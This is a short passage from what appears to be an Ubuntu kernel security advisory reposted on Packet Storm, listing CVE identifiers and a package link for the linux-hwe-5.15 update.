   CVE-2022-4129, CVE-2022-47929, CVE-2022-4842, CVE-2023-0386,  
   CVE-2023-0394, CVE-2023-1073, CVE-2023-1074, CVE-2023-1281,  
   CVE-2023-1652, CVE-2023-26545

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-70.77~20.04.1

Source

Packet Storm